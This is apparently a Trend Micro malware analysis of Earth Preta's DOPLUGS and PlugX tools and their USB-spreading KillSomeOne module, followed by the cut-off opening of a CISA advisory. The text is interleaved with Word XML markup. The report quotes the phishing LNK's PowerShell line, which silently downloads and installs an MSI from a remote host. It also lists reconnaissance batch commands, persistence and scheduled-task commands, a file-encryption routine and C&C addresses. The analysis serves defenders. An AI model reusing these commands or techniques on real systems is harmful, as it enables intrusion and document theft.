urban renewal project in Taiwan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download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5. The Google Drive link embedded in the phishing email; the name of the RAR file on top translates to "Explanation of Urban Renewal Initiative for Residential Development in Phases Two to Five of Shuiyuan Road (attachment password:2024).rar"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download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malicious Windows shortcut files (LNK) seen in Table 1 are as disguised as documents and archived in an RAR file. The target command in the LNK file is as follows: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C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $install=New-Object -ComObject 'WindowsInstaller.Installer';$install.uilevel = 2;$install.InstallProduct('https://getfiledown[.]com/vgbskgyu','REMOVE=ALL');$install.InstallProduct('https://getfiledown[.]com/vgbskgyu') .\SsEWyTjKIfqnOTtTycNpSuEH.pdf</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When the victim selects the LNK file, a MSI file will be downloaded from https://getfiledown[.]com/vgbskgyu, after which it will drop the following files for further execution: %localappdata%\MPTfGRunFbCn\OneNotem.exe (legitimate executable) %localappdata%\MPTfGRunFbCn\msi.dll (malicious DLL file) %localappdata%\MPTfGRunFbCn\NoteLogger.dat (encrypted payload) Analysis of the tools used in the campaign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this section we will go through the detailed analysis of DOPLUGS, DOPLUGS with the KillSomeOne module, and the general type of the PlugX malware. Before introducing the malware, we would like to summarize all the published reports related to the analysis in this section, using the timeline here for reference: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6. Timeline of the malware evolution.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download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timeline indicates the publishing time, the title and source of the report, and the related malware family. The DOPLUGS downloader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DOPLUGS is a downloader with four backdoor commands, one of the commands is designed to download the general type of the PlugX malware. The details of the payload decryption and execution flow were previously discussed by Lab52 in December 2023. Our own analysis will instead focus on backdoor behavior. Infection flow</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7. Infection flow of DOPLUGS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download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2 shows the list of files that are part of the infection flow.</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File name SHA256 Detection name .lnk (Explanation of Urban Renewal Initiative for Residential Development in Phases Two to Five of Shuiyuan Road.lnk) 1a8aeee97a31f2de076b8ea5c04471480aefd5d82c57eab280443c7c376f8d5c Trojan.LNK.DOPLINK.ZTKI 6460c7.msi 364f38b48565814b576f482c1e0eb4c8d58effcd033fd45136ee00640a2b5321 Backdoor.Win32.DOPLUGS.ZTKI OneNotem.exe b9836265c6bfa17cd5e0265f32cedb1ced3b98e85990d000dc8e1298d5d25f93 msi.dll f8c1a4c3060bc139d8ac9ad88d2632d40a96a87d58aba7862f35a396a18f42e5 Trojan.Win32.DOPLUGS.ZTKI NoteLogger.dat a5cd617434e8d0e8ae25b961830113cba7308c2f1ff274f09247de8ed74cac4f Backdoor.Win32.DOPLUGS.ZTKI.enc</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2. File list of the LNK file "," which translates to "Explanation of Urban Renewal Initiative for Residential Development in Phases Two to Five of Shuiyuan Road" Backdoor behavior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Since 2018, Earth Preta has constantly updated the backdoor command sets in the PlugX malware, which has at least four generations according to our observations: PlugX (No given name for this version) REDDELTA Hodur DOPLUGS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summary, the backdoor command for the first three versions can be divided into two groups. The first group (0x1001) contains the functions customized by the threat actor, while the second group (0x1002) is copied from the general type of the PlugX malware. However, in DOPLUGS (the latest version), the backdoor command set only has four commands, with the functions shown in Figure 8.</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8. The DOPLUGS backdoor commands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download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Backdoor command Functionality 0x7002 Starts a CMD shell. The function is directly copied from shell module in the general type of the PlugX malware 0x1007 Splits the data from the command-and-control (C&amp;C) server by ',', with the following data format: {WINHTTP_OPTION_CONNECT_TIMEOUT},{sleep_time}, {WINHTTP_OPTION_SEND_TIMEOUT},{sleep_time} or {WINHTTP_OPTION_RECEIVE_TIMEOUT},{sleep_time}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0x3004 Downloads files from the C&amp;C server, including DLL, EXE and DAT, which are the general type of the PlugX malware 0x1005 Deletes persistence: Deletes registry key (HKCU | HKLM) Software\Microsoft\Windows\CurrentVersion\Run Deletes itself by creating and executing a batch file del_OneNoteUpdate.bat in %temp%</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3. DOPLUGS backdoor commands.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9. Code inside the "del_OneNote Update.bat" batch script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download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Whether sending or receiving data to and from the C&amp;C server, it will be encrypted or decrypted with the RC4 algorithm, which is 0x20 bytes retrieved from the C&amp;C server (however, it is not fixed).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 also observed another variant (dca39474220575004159ecff70054bcf6239803fcf8d30f4e2e3907b5b97129c) that has different backdoor command values, but with the same functionality (shown in Table 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Backdoor Command Functionality 0x7002 Start a CMD shell. The function is directly copied from Shell module in the general type of the PlugX 0x10000001 Split the data from C2 by ',', with the data format: {WINHTTP_OPTION_CONNECT_TIMEOUT},{sleep_time}, {WINHTTP_OPTION_SEND_TIMEOUT},{sleep_time}, or {WINHTTP_OPTION_RECEIVE_TIMEOUT},{sleep_time} 0x3004 Downloads files from the C&amp;C server, including DLL, EXE and DAT, which are the general type of the PlugX malware 0x1005 Deletes persistence: Deletes registry key (HKCU | HKLM) Software\Microsoft\Windows\CurrentVersion\Run Deletes itself in via creating and executing a batch file del_Acrobat Update.bat in %temp%</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4. Another version of the DOPLUGS backdoor commands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Interestingly, this DOPLUGS version abuses legitimate Adobe application to lure victims (with most of the samples VirusTotal sourced from Vietnam). According to the evolution of the backdoor command, we suspect that the original </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>purpose of the 0x1002 group in the previous version is for file delivery only. This also explains why the 0x1002 group has been removed from this version, since the downloader behavior for the next-stage payload is replaced by the 0x3004 backdoor command. The general type of the PlugX malware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this section, we will introduce the general type of the PlugX malware that is downloaded via the backdoor command 0x3004 in DOPLUGS. Fortunately, we were able to download two types of final payloads from the C&amp;C server for our analysis. Table 5 shows the downloaded files.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C&amp;C server source Type File name Description PlugX C&amp;C server electrictulsa[.]com:443 1 adobe_licensing_wf_helper.exe Legitimate executable for sideloading web[.]bonuscave[.]com:8080 libcef.dll Malicious loader licensing.dat Encrypted payload ivibers[.]com:443 or meetviberapi[.]com:443 2 Avastsz.exe Legitimate executable for sideloading www[.]markplay[.]net:8080 images[.]markplay[.]net:443 SZBrowser.dll Malicious loader log.dat Encrypted payload 149[.]104[.]12[.]64:443 2 Avastsz.exe Legitimate executable for sideloading news[.]comsnews[.]com:443 news[.]comsnews[.]com:5938 images[.]kiidcloud[.]com:443 127[.]0[.]0[.]1:8080 127[.]0[.]0[.]1:8000 SZBrowser.dll Malicious loader log.dat Encrypted payload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5. List of general PlugX malware types downloaded via DOPLUGS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a report published by Palo Alto, these samples of the general PlugX malware might be modified from the THOR PlugX based on the following observations: Both have a similar code structure in DLL loaders.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Both have the same shellcode before entering the PlugX main function. Both have the same argument in the command-line execution.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download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10. The function to enter the shellcode in the loader of the THOR PlugX malware (top) and the Earth Preta general type of the PlugX malware (bottom)</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download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download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11. The shellcode of the THOR PlugX malware (top) and the Earth Preta general type of the PlugX malware (bottom)</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download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download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12. The arguments used in command line of THOR PlugX malware (top) and Earth Preta general type of the PlugX malware (bottom)</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download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Type 1 File name SHA256 adobe_licensing_wf_helper.exe 93624d0ad03998dd267ae8048ff05e25b5fd5f7b4116a2aff88c87d42422d5dc libcef.dll 583941ca6e1a2e007f5f0e2e112054e44b18687894ac173d0e93e035cea25e83 licensing.dat e3bae2e2b757a76db92ab017328d1459b181f8d98e04b691b62ff65d1e1be280</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6. File list of the type 1 general type of the PlugX malware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When the adobe_licensing_wf_helper.exe file is launched by DOPLUGS, the command line will not have any argument. The execution flow is as follows: The adobe_licensing_wf_helper.exe file is for installation and setting persistence.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The adobe_licensing_wf_helper.exe 600 0 file injects itself into %SystemRoot%\system32\WerFault.exe with arguments 601 0.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The "%SystemRoot%\system32\WerFault.exe 601 0 file executes the backdoor command.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Here is the functionality of each first argument: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First argument Functionality None Same as the condition (100) 100 Sets persistence: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Installs files into %ProgramFiles%\Common Files\Adobe Licensing Helper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Creates service with the name "Adobe Licensing Helper" Command line: %ProgramFiles%\Common Files\Adobe Licensing Helper\adobe_licensing_wf_helper.exe 600 0</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Creates registry Software\Microsoft\Windows\CurrentVersion\Run with name "Adobe Licensing Helper" Command line: %ProgramFiles%\Common Files\Adobe Licensing Helper\adobe_licensing_wf_helper.exe 600 0 600 Injects the PlugX process into %SystemRoot%\system32\WerFault.exe with the arguments 601 0 601 Executes the backdoor command of the general type of the PlugX malware 609 Receives the backdoor command from pipe and sends the result into the main process in pipe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7. The functionalities of each first argument Type 2</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File name SHA256 Avastsz.exe b975af70ee9bdfdc6e491b58dd83385f3396429a728f9939abade48d15941ea1 SZBrowser.dll 60b3a42b96b98868cae2c8f87d6ed74a57a64b284917e8e0f6c248c691d51797 log.dat eb9e557fac3dd50cc46a544975235ebfce6b592e90437d967c9afba234a33f13</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8. File list of the type 2 general type of the PlugX malware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command-line argument is replaced from 6xx to 7xx but keeps the same functionality.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13. The arguments used in the command line of type 2 PlugX</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download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Another part is the configuration decryption. In the type 1 PlugX malware, the configuration section is shown in plain text after decryption, but for type 2, it's still encrypted. The configuration data will need to be decrypted again with the RC4 key qwedfgx202211 only when the process needs it.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Figure 14. The encrypted C&amp;C server in the configuration (shown as "www.markplay[.]net" when decrypted)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download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15. Encrypted installation directory in the configuration ("%ProgramFiles%\Common Files\System\Avast" when decrypted)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download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16. The encrypted registry name in the configuration (Avast Browser Service when decrypted)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download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Offset Value +0x10</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File extensions that are read by the keylogger: *.doc* *.pdf *.xls *.ppt* *.mp3 *.wav +0x828 C&amp;C list +0xD58 Install directory +0xF58 Registry Name +0x1158 Service Name +0x1358 Service Name +0x1558 RC4 Key for packet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9. The configuration structure of the type 2 PlugX malware Integration with KillSomeOne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hunting for more DOPLUGS related samples, we came across a DOPLUGS variant with KillSomeOne functionality. The KillSomeOne module is a plug-in specializing in malware distribution, information collection, and document theft via USB. It expands the ability for infection so that initial access methods are not limited to phishing or decoy documents.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KillSomeOne module was first introduced in a November 2020 Sophos report. The DOPLUGS variant with the KillSomeOne module has high similarities with the previous DOPLUGS variant we analyzed, with one of the major differences being the infection method. It has four components: a legitimate executable, a malicious DLL, an encrypted payload, and an encrypted PE file. This variant has an extra launcher file that executes the legitimate executable to perform DLL-sideloading behaviors.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Archive File name Description 1.rar (a0c94205ca2ed1bcdf065c7aeb96a0c99f33495e7bbfd2ccba36daebd829a916) HPSmart.exe legitimate EXE InstanceFinderDlgUI.dll malicious DLL InstanceFinderDlg.dat encrypted payload HPReport.exe encrypted launcher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10. File list of the DOPLUGS variant with the KillSomeOne module The loader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loader InstanceFinderDlgUI.dll, compiled by Golang, is the only one we found. Figure 20 shows its functions.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17. Golang functions of the file "InstanceFinderDlgUI.dll"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download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Its execution flow is as follows: It reads the encrypted payload, InstanceFinderDlg.dat in the same folder. It decrypts the encrypted payload by XOR with the single key, 0x73. It enters the decrypted payload by main_NTCreateThreadEx. The payload behavior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payload process is similar to the regular DOPLUGS variant. The function checks the argument of the command line HPSmart.exe "argument". There is no argument in the first execution: It only sets up persistence and relaunches itself with the argument, which is the three-digit random number. We list the command-line arguments and their corresponding behavior in the following table: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Argument Behavior No argument Sets up persistence XXX (Random three digit number) KillSomeOne thread / DOPLUGS backdoor behavior -net Sets up persistence / Sets the value of key registry System\CurrentControlSet\Control\Network\Version to "1" "1" "0" Enables Wi-Fi connection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11. The behavior of each command-line argument Setting up Persistence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Persistence is set up via the following steps: The function copies all the files to the installation directory, C:\Users\Public\HPSmartMZWx\.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It sets up the value C:\Users\Public\HPSmartMZWx\HPSmart.exe xxx in the registry Software\Microsoft\Windows\CurrentVersion\Run key for persistence. It creates Process C:\Users\Public\HPSmartMZWx\HPSmart.exe xxx.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>KillSomeOne Thread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KillSomeOne thread has two major behaviors, the first of which removes all traces related to previous pieces of PlugX malware, including files, process, registry, and scheduled tasks.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Deleted object Target name list Process with corresponding folder and persistence in registry Adobe Desktop Service.exe identity_helper.exe pidgin.exe WaveeditsNero.exe svchost.exe (if no argument) WaveeditNero.exe gup.exe Silverlight.Configuration.exe, waveedit.exe waveedits.exe Adobe_licensing_wf.exe adobe_wf.exe MicrosoftEdges.exe Opera.exe WeChat.exe symantecs.exe Symantec.exe msexpert.exe vivaldi.exe CUZ.exe RzCef.exe CefRender.exe RzProcess.exe RzerProcess.exe service_host.exe mfpmp.exe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Scheduled tasks udisk_1 udisk_2 ZBT_0.1 LKUFORYOU_1 AcroRd32 udisk_1.00 LKUFORYOU_2 udisk_1.03 udisk_1.02 AdobeDesktop Key in registry (HKCU|HKLM) Software\Microsoft\Windows\CurrentVersion\Run key Razer RzCef CefRender RzerProcess CefRz X32dbg vstool_x86 WindowsNT nvcplui NeroEdit AdobeDesktop Folder C:\Users\Public\AdobeDesktop\, C:\ProgramData\Razer\, C:\ProgramData\RazerCefProcess\, C:\ProgramData\CefRz\, C:\ProgramData\DebugReport\, C:\programData\RzerProcess\, C:\ProgramData\SymantecSEndpoint\Bin\ File C:\ProgramData\FmtOptions.dll" (possibly related to LuminousMouth)</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12. Removing traces of the previous piece of PlugX malware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second behavior is related to USB infection. It applies the API DeviceIoControl with the parameter 0x2d1400 to identify the USB drive. It then creates three threads in the targeted USB drive, which we detail in the following sections. Thread 1: Worm behavior in USB drive (Lateral Movement)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This thread creates the mutex USB_NOTIFY3_INF_{USB_volume} for mark. Before the worm behavior, these registries are enabled to hide the file extension and the folders that contain malware and stolen documents.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, Hidden=0 HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, ShowSuperHidden=0 HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, HideFileExt=1</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infected USB drives, the four components are copied into the hidden folder.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>HPReport.exe to {USB_volume}:\Usb Drive\1.0\5.dat HPSmart.exe to {USB_volume}:\Usb Drive\1.0\6.dat InstanceFinderDlgUI.dll to {USB_volume}:\Usb Drive\1.0\2.dat InstanceFinderDlg.dat to {USB_volume}:\Usb Drive\1.0\InstanceFinderDlg.dat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18. The copied 4 files in a USB drive.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download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decrypted launcher, HPReport.exe, is copied to {USB_volume}:\Usb Disk ({free space of USB}).exe, (which is disguised as a USB drive) and duplicated with the name opn-U({free space of USB}).cmd.to the following folders: {USB_volume}:\AVAST\Protection for Autorun\ {USB_volume}:\SMADAV\SMADAV\ {USB_volume}:\Removable Disk\</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KillSomeOne module specializes in USB infections. The launcher pretends to be a fake USB disk to lure victims into selecting it - a convincing guise unless users check the extension. The purpose of the launcher is simple: It renames 2.dat to InstanceFinderDlgUI.dll and executes 6.dat, which is the executable file that will sideload the InstanceFinderDlgUI.dll file via DLL sideloading.</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19. The decrypted launcher in the USB drive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download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All the files under these folders will be copied to {USB_volume}:\Usb Disk\: {USB_volume}:\ {USB_volume}:\Kaspersky\ {USB_volume}:\Kaspersky\Usb Drive\ {USB_volume}:\Usb Drive\3.0\ {USB_volume}:\Kaspersky\Removable Disk\ (Including files in subfolder) {USB_volume}:\AVAST\Protection for Autorun\ (Including files in subfolder) {USB_volume}:\SMADAV\SMADAV\ (Including files in subfolder) Thread 2: Information or file stealer (Collection)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thread creates the mutex, USB_NOTIFY3_COP_{USB_volume}, for mark. There are two kinds of stealing conditions, each of which we discuss here: First condition: Steals the document files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If the connection succeeds in connecting to https://www.microsoft.com/, it will check the file extensions in these predefined folders: {USB_volume}:\Kaspersky\Usb Drive\1.0\ {USB_volume}:\Usb Drive\1.0\ {USB_volume}:\.System\Device\USB\3.0\Kaspersky\Usb Drive\1.0 {USB_volume}:\.System\Device\USB\3.0\Usb Drive\1.0\</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If the file extensions are not .cmd, .bat, or .dll and the file name is not RECYCLERS.BIN, it will transfer the file to %userprofile%\AppData\Roaming\Render\1.0\ and empty the content of the original file.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 also found another functionality, but it seems that it has not been implemented as of this writing. This functionality collects all files under the same folders and looks for the files with the following extensions: .doc .docx .ppt .pptx .xls .xlsx .pdf</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Afterward, it will encode the file name with base64, encrypt the file content, and copy the file to the folder of the current process.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Here is the XOR algorithm to encrypt the stolen files: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encrypted_contents = []</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encrypted_key = 0x6D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i in range(len(contents)):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encrypted_contents.append(contents[i] encrypted_key)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encrypted_key += 0xAA Second condition: Steals victim information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If the connection fails, the thread checks the value in registry (HKCU|HKLM)\System\CurrentControlSet\Control\Network\Version, which does not exist. Afterward, it creates and executes the batch script %temp%\edg{value of QueryPerformanceCounter}.bat to collect the information of the victim.</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%comspec% /q /c systeminfo &gt;"%~dp0AE353BBEB1C6603E_E.dat"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%comspec% /q /c ipconfig /all &gt;&gt;"%~dp0AE353BBEB1C6603E_E.dat"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%comspec% /q /c netstat -ano &gt;&gt;"%~dp0AE353BBEB1C6603E_E.dat"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%comspec% /q /c arp -a &gt;&gt;"%~dp0AE353BBEB1C6603E_E.dat"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%comspec% /q /c tasklist /v &gt;&gt;"%~dp0AE353BBEB1C6603E_E.dat"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del %0</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output data will then be encrypted and dropped to {USB_volume}:\Usb Drive\1.0\ {value of SOFTWARE\CLASSES\ms-pu\CLSID}.dat. Thread 3: Execute encrypted batch script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thread creates the mutex, USB_NOTIFY_BAT_H3_{USB_volume} for mark, which will be executed only under these conditions: When connection with https://www.microsoft.com fails When there is no value in System\\CurrentControlSet\\Control\\Network\\version (this registry is enabled when argument of cmd line = "-net")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thread will search all batch scripts inside the following folders: {USB_volume}:\Usb Drive\1.0\p\ {USB_volume}:\Kaspersky\Usb Drive\1.0\p\ {USB_volume}:\.System\Device\USB\3.0\Usb Drive\1.0\p\</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If the batch script name does not contain the strings tmpc_ or tmp_, the script will be decrypted via XOR algorithm, which is the same as the file encryption in the thread 2 subsection. The new batch will then be created in %temp%\{value of QueryPerformanceCounter}.bat and executed by ShellExecuteW with the following contents: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{USB_volume} cd "{USB_volume}:\target folder\" {decrypted contents in batch file} del %0 DOPLUGS backdoor behavior (Command and Control)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behavior is the same as the original piece of DOPLUGS malware and is responsible for C&amp;C communication, backdoor commands, and downloading the next-stage general type of the PlugX malware. Enabling Wi-Fi connection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following command line is executed to set up scheduled tasks to enable Wi-Fi connection: cmd.exe /c schtasks.exe /create /sc minute /mo 30 /tn "Security WIFI Script" /tr "netsh interface set interface """Wireless Network Connection""" enabled" /ru SYSTEM /F&amp;schtasks.exe /run /tn "Security WIFI Script" cmd.exe /c schtasks.exe /create /sc minute /mo 30 /tn "Security WIFI2 Script" /tr "netsh interface set interface """Wireless Network Connection 2""" enabled" /ru SYSTEM /F&amp;schtasks.exe /run /tn "Security WIFI2 Script" cmd.exe /c schtasks.exe /create /sc minute /mo 30 /tn "Security WIFI3 Script" /tr "netsh interface set interface """Wireless Network Connection 3""" enabled" /ru SYSTEM /F&amp;schtasks.exe /run /tn "Security WIFI3 Script" Old variant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addition to DOPLUGS, we hunted down several customized PlugX malware samples that are also equipped with the KillSomeOne module. Based on our investigation, this integration would have been active for three years, with the report published by Avira being the first to reveal this technique. The sample mentioned in Avira's report is the first PlugX variant with the KillSomeOne module designed for spreading via USB.</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following table is a list of different PlugX malware types with integrate KillSomeOne variants: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Active since (approximation) Sample hash (SHA256) Variant C&amp;C server November 2023 3fa7eaa4697cfcf71d0bd5aa9d2dbec495d7eac43bdfcfbef07a306635e4973b KillSomeOne + DOPLUGS 45[.]83[.]236[.]105:443 December 2022 to May 2023 17225c9e46f809556616d9e09d29fd7c13ca90d25ae21e00cc9ad7857ee66b82 KillSomeOne + (Transitioning between Hodur and DOPLUGS) 45[.]131[.]179[.]179:22 45[.]131[.]179[.]179:443 45[.]131[.]179[.]179:5938 103[.]192[.]226[.]46:44 3127.0.0.1:80</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September 2021 to December 2022 d0ca6917c042e417da5996efa49afca6cb15f09e3b0b41cbc94aab65a409e9dc KillSomeOne + Hodur First category 154[.]204.27.181:80 154[.]204.27.181:110 103[.]56.53.120:80 103[.]56.53.120:8080</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Second category 176[.]113.69.91:443 September 2018 d64afd9799d8de3f39a4ce99584fa67a615a667945532cfa3f702adbe27724c4 KillSomeOne + first variant of the PlugX malware 45[.]251[.]240[.]55:443 45[.]251[.]240[.]55:8080</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13. Different stages of evolution for KillSomeOne + PlugX</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Upon checking backdoor commands of these PlugX malware types, we found an additional variant that serves as the transition from DOPLUGS to Hodur. This version keeps the disk module of the general type of the PlugX malware, although here the customized backdoor command is modified to the improved DOPLUGS type (unlike the original DOPLUGS variant without any module from the general type of the PlugX malware). Another impressive feature is that the KillSomeOne + Hodur variant has two categories of C&amp;C servers for communication: the first one as a regular C&amp;C server to receive backdoor commands, while the second one is designed to download payloads for process injection in svchost.exe. Conclusion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Earth Preta has primarily focused on targeting government entities worldwide, particularly within the Asia-Pacific region and Europe. Based on our observations, we believe Earth Preta tends to use spear-phishing emails and Google Drive links in its attacks.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 explained the purpose of the DOPLUGS malware (which we believe has been in use since 2022), one of the primary tools Earth Preta uses to download the general type of the PlugX malware. While hunting for other samples, we discovered a DOPLUGS variant that has KillSomeOne module integration and that can be traced back to 2018. This shows that Earth Preta has been refining its tools for some time now, constantly adding new functionalities and features.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Over the course of our investigations into Earth Preta's activities, we have observed that the group remains highly active, particularly in Europe and Asia. It is likely that we will hear more from this group in the future, so it is a good idea for security teams to familiarize themselves with how Earth Preta operates.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MITRE ATT&amp;CK Tactic ID Name Resource Development T1583.004 Acquire Infrastructure: Server T1587.001 Develop Capabilities: Malware T1585.002 Establish Accounts: Email Accounts T1588.002 Obtain Capabilities: Tool T1608.001 Stage Capabilities: Upload Malware T1608.005 Link Target Initial Access T1566.002 Phishing: Spearphishing Link T1090 Replication Through Removable Media Execution T1204.002 User Execution: Malicious File Persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1574.002 Hijack Execution Flow: DLL Side-Loading T1053.005 Scheduled Task/Job: Scheduled Task Defense Evasion T1140 Deobfuscate/Decode Files or Information T1036.005 Masquerading: Match Legitimate Name or Location T1070.009 Indicator Removal: Clear Persistence T1564.001 Hidden Files and Directories Credential Access T1056.001 Input Capture: Keylogging Discovery T1083 File and Directory Discovery T1016.001 Internet Connection Discovery T1049 System Network Connections Discovery T1082 System Information Discovery T1012 Query Registry Lateral Movement T1091 Replication Through Removable Media Collection T1005 Data from Local System T1025 Data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>from Removable Media Command and Control T1071.001 Application Layer Protocol: Web Protocols T1573 Encrypted Channel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Indicators of Compromise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indicators of compromise for this entry can be found here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2024.02.20 12:11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Threat Actor Leverages Compromised Account of Former Employee to Access State Government Organization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Release Date February 15, 2024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Alert Code AA24-046A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Cyber Threats and Advisories, Incident Detection, Response, and Prevention, Malware, Phishing, and Ransomware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Actions to take today to mitigate malicious cyber activity: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Continuously remove and disable accounts and groups from the enterprise that are no longer needed, especially privileged accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enable and enforce multifactor authentication with strong passwords. Store credentials in a secure manner, such as with a credential manager, vault, or other privilege account management solution.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SUMMARY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Cybersecurity and Infrastructure Security Agency (CISA) and the Multi- State Information Sharing &amp; Analysis Center (MS-ISAC) conducted an incident response assessment of a state government organization's network environment after documents containing host and user information, including metadata, were posted on a dark web brokerage site. Analysis confirmed that an unidentified threat actor compromised network administrator credentials through the account of a former employee-a technique commonly leveraged by threat actors-to successfully authenticate to an internal virtual private network (VPN) access point, further navigate the victim's on-premises environment, and execute various lightweight directory access protocol (LDAP) queries against a domain controller.[1] Analysis also focused on the victim's Azure environment, which hosts sensitive systems and data, as well as the compromised on-premises environment. Analysis determined there were no indications the threat actor further compromised the organization by moving laterally from the on-premises environment to the Azure environment.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CISA and MS-ISAC are releasing this Cybersecurity Advisory (CSA) to provide network defenders with the tactics, techniques, and procedures (TTPs) used by the threat actor and methods to protect against similar exploitation of both unnecessary and privileged accounts.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Download the PDF version of this report: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AA24-046A Threat Actor Leverages Compromised Account of Former Employee to Access State Government Organization (PDF, 499.99 KB ) TECHNICAL DETAILS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Note: This advisory uses the MITRE ATT&amp;CK for Enterprise framework, version 14. See the MITRE ATT&amp;CK Tactics and Techniques section for a table of the threat actor's activity mapped to MITRE ATT&amp;CK(R) tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK's Best Practices for MITRE ATT&amp;CK Mapping and CISA's Decider Tool. Overview</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state government organization was notified that documents containing host and user information, including metadata, were posted on a dark web brokerage site. After further investigation, the victim organization determined that the documents were accessed via the compromised account of a former employee. Threat actors commonly leverage valid accounts, including accounts of former employees that have not been properly removed from the Active Directory (AD), to gain access to organizations.[1] CISA and MS-ISAC assessed that an unidentified threat actor likely accessed documents containing host and user information to post on the dark web for profit after gaining access through the account of a former employee.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scope of this investigation included the victim organization's on- premises environment, as well as their Azure environment, which hosts sensitive systems and data. Analysis determined the threat actor did not move laterally from the compromised on-premises network to the Azure environment and did not compromise sensitive systems. Untitled Goose Tool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Incident responders collected Azure and Microsoft Defender for Endpoint (MDE) logs using CISA's Untitled Goose Tool-a free tool to help network defenders detect potentially malicious activity in Microsoft Azure, Azure Active Directory (AAD), and Microsoft 365 (M365) environments. CISA developed the Untitled Goose Tool to export and review AAD sign-in and audit logs, M365 unified audit logs (UAL), Azure activity logs, and MDE data. By exporting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
